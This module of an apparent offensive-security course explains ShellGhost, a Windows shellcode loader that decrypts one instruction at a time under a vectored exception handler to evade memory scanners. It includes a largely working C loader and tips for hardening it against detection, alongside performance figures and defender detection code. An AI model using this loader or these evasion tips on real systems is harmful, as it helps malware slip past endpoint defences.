Difficulty: Advanced

Module 8: Full Chain, Performance & Detection

The complete execution flow, real-world performance implications, detection vectors, and how ShellGhost compares to other memory evasion techniques.

Module Objective

This final module consolidates everything into a complete end-to-end walkthrough of ShellGhost, analyzes the performance overhead of per-instruction exception handling, catalogs the detection vectors that defenders can use to identify ShellGhost, and compares it against alternative memory evasion techniques like sleep encryption and module stomping. You will leave this module with a complete understanding of ShellGhost's strengths, limitations, and place in the offensive tooling landscape.

1. Complete Execution Flow

Here is the complete ShellGhost chain from program start to shellcode completion, combining every concept from the previous seven modules:

ShellGhost End-to-End Pipeline

1. Preprocess
mapping.py
2. Compile
Encrypted data + map
3. Alloc RW
Fill with 0xCC
4. Register VEH
First = 1
5. CreateThread
.text end entry
6. BP Loop
Per-instruction
7. Cleanup
Remove VEH, free
C// Complete ShellGhost implementation (simplified, shows architecture)
#include <windows.h>
#include <string.h>

// ============ Types ============
typedef struct _CRYPT_BYTES_QUOTA {
    DWORD rva;
    DWORD quota;
} CRYPT_BYTES_QUOTA;

typedef NTSTATUS (WINAPI *_SystemFunction032)(
    PUNICODE_STRING, PUNICODE_STRING);

// ============ Global State ============
static struct {
    PBYTE exec_base;
    SIZE_T exec_size;
    PBYTE enc_sc;          // Pre-encrypted shellcode (from mapping.py)
    SIZE_T sc_size;
    CRYPT_BYTES_QUOTA *map;
    DWORD num_instr;
    DWORD current_index;
    INT prev_index;
    BYTE key[16];
    USHORT key_len;
    _SystemFunction032 pSF032;
} G;

// ============ VEH Handler ============
LONG CALLBACK Handler(PEXCEPTION_POINTERS ep) {
    PEXCEPTION_RECORD r = ep->ExceptionRecord;
    PCONTEXT c = ep->ContextRecord;
    DWORD old;

    if (r->ExceptionCode == EXCEPTION_BREAKPOINT) {
        // Rip already adjusted by kernel (no -1 needed)
        PBYTE addr = (PBYTE)c->Rip;
        if (addr < G.exec_base ||
            addr >= G.exec_base + G.exec_size)
            return EXCEPTION_CONTINUE_SEARCH;

        // Toggle to RW for writing
        VirtualProtect(G.exec_base, G.exec_size,
                        PAGE_READWRITE, &old);

        // Re-encrypt previous instruction
        if (G.prev_index >= 0) {
            CRYPT_BYTES_QUOTA *prev = &G.map[G.prev_index];
            memset(G.exec_base + prev->rva, 0xCC, prev->quota);
        }

        // Decrypt current instruction via SystemFunction032
        CRYPT_BYTES_QUOTA *curr = &G.map[G.current_index];
        memcpy(G.exec_base + curr->rva,
               G.enc_sc + curr->rva, curr->quota);
        UNICODE_STRING data = {
            (USHORT)curr->quota, (USHORT)curr->quota,
            (PWSTR)(G.exec_base + curr->rva) };
        UNICODE_STRING key = {
            G.key_len, G.key_len, (PWSTR)G.key };
        G.pSF032(&data, &key);

        // Toggle to RX for execution
        VirtualProtect(G.exec_base, G.exec_size,
                        PAGE_EXECUTE_READ, &old);

        G.prev_index = G.current_index;
        G.current_index++;
        return EXCEPTION_CONTINUE_EXECUTION;
    }

    return EXCEPTION_CONTINUE_SEARCH;
}

// ============ Main ============
void ShellGhostRun(
    PBYTE enc_sc, SIZE_T sc_size,       // From mapping.py
    CRYPT_BYTES_QUOTA *map, DWORD n_instr,
    PBYTE key, USHORT key_len
) {
    // 1. Store references
    G.enc_sc = enc_sc;
    G.sc_size = sc_size;
    G.map = map;
    G.num_instr = n_instr;
    memcpy(G.key, key, key_len);
    G.key_len = key_len;
    G.prev_index = -1;
    G.current_index = 0;

    // 2. Resolve SystemFunction032
    G.pSF032 = (_SystemFunction032)GetProcAddress(
        LoadLibraryA("advapi32.dll"), "SystemFunction032");

    // 3. Allocate RW buffer filled with 0xCC
    G.exec_base = (PBYTE)VirtualAlloc(NULL, sc_size,
        MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    memset(G.exec_base, 0xCC, sc_size);
    G.exec_size = sc_size;

    // 4. Register VEH handler
    PVOID h = AddVectoredExceptionHandler(1, Handler);

    // 5. Create thread at end of .text segment
    LPVOID entry = ResolveEndofTextSegment();
    HANDLE hThread = CreateThread(NULL, 0,
        (LPTHREAD_START_ROUTINE)entry, NULL, 0, NULL);
    WaitForSingleObject(hThread, INFINITE);

    // 6. Cleanup
    RemoveVectoredExceptionHandler(h);
    VirtualFree(G.exec_base, 0, MEM_RELEASE);
}

2. Performance Impact Analysis

ShellGhost's per-instruction exception model introduces significant overhead compared to native execution. Understanding the performance cost is essential for assessing when this technique is practical.

Exception Overhead Breakdown

OperationApproximate CostFrequency
Kernel trap (INT3)~1,000-5,000 cyclesOnce per instruction
Context save to KTRAP_FRAME~500-1,000 cyclesOnce per instruction
User-mode dispatch (KiUserExceptionDispatcher)~2,000-5,000 cyclesOnce per instruction
VEH handler lookup + call~100-500 cyclesOnce per instruction
SystemFunction032 decrypt~50-200 cyclesOnce per instruction
VirtualProtect RW↔RX toggle~1,000-3,000 cyclesTwice per instruction (RX→RW, then RW→RX)
Memory write (re-encrypt + decrypt)~10-100 cyclesOnce per instruction
NtContinue (restore CONTEXT)~2,000-5,000 cyclesOnce per instruction

Total overhead per shellcode instruction: approximately 7,000 to 20,000 CPU cycles. A typical instruction executes in 1-5 cycles natively. This means ShellGhost imposes a slowdown factor of roughly 1,500x to 20,000x. Note that the one-exception model (breakpoint only, no single-step) is approximately half the exception overhead of a two-exception approach.

Practical Impact

Shellcode TypeNative ExecutionShellGhost ExecutionVerdict
Stager (small, network setup)<1 ms~50-200 msAcceptable for a stager payload
Stageless beacon (~200KB)~1 ms~5-30 seconds for initial setupNoticeable delay but usually tolerable
Continuous C2 loopReal-timeSignificant latency per iterationShellGhost is best for initialization, not continuous operation
Compute-heavy shellcodeVariesExtremely slowNot suitable for compute-bound payloads

Mitigation: Hybrid Approach

ShellGhost is most effective as a stager or initialization mechanism. The shellcode executed under ShellGhost's protection performs the minimum necessary work (resolve APIs, establish initial C2 connection, allocate new memory) and then copies a second-stage payload to a new region for native-speed execution. This way, the most sensitive phase (initial beacon setup, which is the most likely time for a memory scan) is protected, while long-running operations execute at normal speed.

3. Detection Vectors

While ShellGhost defeats memory signature scanning, it introduces several behavioral indicators that defenders can detect:

Detection VectorObservable IndicatorDetection MethodDifficulty
VEH RegistrationAddVectoredExceptionHandler API callAPI hook, ETW Microsoft-Windows-Kernel-Audit-API-Calls providerEasy
Excessive ExceptionsThousands of EXCEPTION_BREAKPOINT per secondPerformance counters, ETW exception events, kernel callbacksMedium
RW/RX Memory TogglingFrequent VirtualProtect calls toggling between PAGE_READWRITE and PAGE_EXECUTE_READAPI hook on VirtualProtect, ETW memory protection eventsMedium
0xCC-Filled MemoryA memory region containing almost entirely 0xCC bytesHeuristic scan for homogeneous INT3 regionsMedium
VEH Handler List InspectionNon-standard VEH handlers registered in the processWalking ntdll!LdrpVectorHandlerListMedium
Thread Entry PointThread with entry point in the .text segment (at null bytes near the end)Thread creation monitoring, unusual start address analysisHard
KiUserExceptionDispatcher FrequencyExtremely high rate of user-mode exception dispatchHooking KiUserExceptionDispatcher or monitoring debug eventsMedium

4. Detection Deep Dive: VEH Registration Monitoring

C// Defender perspective: detecting VEH handler registration
// Method 1: Hook AddVectoredExceptionHandler
typedef PVOID (WINAPI *pAddVEH)(ULONG, PVECTORED_EXCEPTION_HANDLER);
pAddVEH OriginalAddVEH;

PVOID WINAPI HookedAddVEH(ULONG First, PVECTORED_EXCEPTION_HANDLER Handler) {
    // Log the registration
    LogEvent("VEH handler registered: First=%d, Handler=%p", First, Handler);

    // Check if the handler address is in a suspicious region
    MEMORY_BASIC_INFORMATION mbi;
    VirtualQuery(Handler, &mbi, sizeof(mbi));
    if (mbi.Type == MEM_PRIVATE && mbi.State == MEM_COMMIT) {
        AlertEvent("VEH handler in private memory (potential shellcode)");
    }

    return OriginalAddVEH(First, Handler);
}

// Method 2: Walk the VEH handler list directly
// (requires knowledge of ntdll internal structures)
// The handler list is at ntdll!LdrpVectorHandlerList

5. Detection Deep Dive: Exception Rate Monitoring

C// Defender perspective: detecting excessive exception rates
// Using Windows Performance Counters or ETW

// Normal process: 0-10 exceptions per second
// ShellGhost process: 10,000-100,000+ exceptions per second

// ETW-based detection:
// Provider: Microsoft-Windows-Kernel-Audit-API-Calls
// Events: Exception dispatch events
// Threshold: Alert if > 1000 exceptions/second sustained

Exception Rate as an IoC

A normal Windows process generates very few exceptions during regular operation. ShellGhost generates one EXCEPTION_BREAKPOINT for every single shellcode instruction. A typical shellcode payload might execute tens of thousands of instructions during initialization alone. This creates an exception rate that is orders of magnitude above normal, making it a strong Indicator of Compromise (IoC) for behavioral detection. Note that ShellGhost's one-exception model generates half the exceptions compared to a two-exception (breakpoint + single-step) approach, but this is still far above baseline.

6. Comparison with Other Memory Evasion Techniques

TechniqueDecryption SurfacePerformanceDetection DifficultyComplexity
Sleep Encryption (Ekko)Full payload during active phaseMinimal (native speed when active)Medium (timer objects, VirtualProtect pattern)Medium
FoliageFull payload during active phaseMinimal (APC-based timer)Medium (APC queue monitoring)Medium-High
Module StompingFull payload (but appears backed by DLL)Native speedMedium (.text section hash mismatch)Low-Medium
Page Guard TogglingOne page (4KB)Moderate (one exception per page)Medium (VirtualProtect frequency)Medium
ShellGhost1 instruction (~1-15 bytes)Very slow (1 exception + 2 VirtualProtect per instruction)Medium (exception rate, VEH registration, RW/RX toggling)High

When to Use ShellGhost

7. Hardening ShellGhost

Several modifications can make ShellGhost more resistant to the detection vectors identified above:

Reducing Observable Indicators

Detection VectorHardening Approach
RW/RX toggling frequencyShellGhost already avoids RWX by toggling between RW and RX. To reduce VirtualProtect call frequency, batch multiple instructions between toggles (increases decryption surface but reduces overhead).
VEH registrationUse direct syscalls for NtAddVectoredExceptionHandler to bypass API hooks
0xCC-filled regionFill unused bytes with random data instead of uniform 0xCC. Use a different single-byte trap instruction.
Exception rateAdd artificial delays between instructions to reduce exception frequency (further reduces performance)
VEH list inspectionEncode the handler pointer manually using the same scheme as RtlEncodePointer

8. Course Summary

What You Have Learned

ModuleTopicKey Concept
1Memory Scanner EvasionFull decryption creates a detectable window; minimal decryption surface is the goal
2Software BreakpointsINT3 (0xCC) is a 1-byte instruction that generates EXCEPTION_BREAKPOINT (0x80000003)
3Vectored Exception HandlingVEH handlers run before SEH; AddVectoredExceptionHandler with First=1 gives highest priority
4The ShellGhost ConceptOne-exception cycle: each BREAKPOINT handler re-encrypts previous instruction AND decrypts current one
5SystemFunction032 & Shellcode MappingPython preprocessing generates CRYPT_BYTES_QUOTA maps; SystemFunction032 provides per-instruction RC4
6VEH Handler ImplementationContextRecord->Rip used directly (kernel-adjusted); RW/RX toggling via VirtualProtect
7Background: Trap Flag & Single-SteppingGeneral x86 knowledge about TF/EXCEPTION_SINGLE_STEP (not used by ShellGhost)
8Full Chain & Detection~1,500-20,000x slowdown; detectable via VEH registration, exception rate, RW/RX toggling

The Core Innovation

ShellGhost's innovation is twofold: (1) the shellcode mapping preprocessing pipeline that disassembles shellcode and enables per-instruction independent encryption via SystemFunction032, and (2) the realization that a one-exception cycle using only EXCEPTION_BREAKPOINT (no trap flag) is sufficient for decrypt-execute-reencrypt semantics. Combined with RW/RX memory toggling and thread creation at the .text segment end, lem0nSec created a technique that makes shellcode effectively invisible to memory scanners while avoiding common IoCs like RWX memory and thread entry in private memory. This trade-off is compelling for scenarios where stealth matters more than performance — particularly for initial-stage execution.

Knowledge Check

Q1: What is the approximate performance overhead of ShellGhost compared to native shellcode execution?

A) 2-5x slower
B) 10-100x slower
C) 1,500-20,000x slower (due to kernel transition + VirtualProtect per instruction)
D) No measurable difference

Q2: Which detection vector is most straightforward for defenders to monitor?

A) RC4 keystream bias analysis
B) AddVectoredExceptionHandler API call combined with high EXCEPTION_BREAKPOINT rate
C) Scanning for 0xCC bytes in all memory regions
D) Monitoring CPU temperature for exception overhead

Q3: What is the recommended use case for ShellGhost in a real operation?

A) As a stager or initialization mechanism that transitions to native execution after setup
B) For continuous C2 beacon communication
C) For compute-intensive post-exploitation tasks
D) As a replacement for all shellcode loaders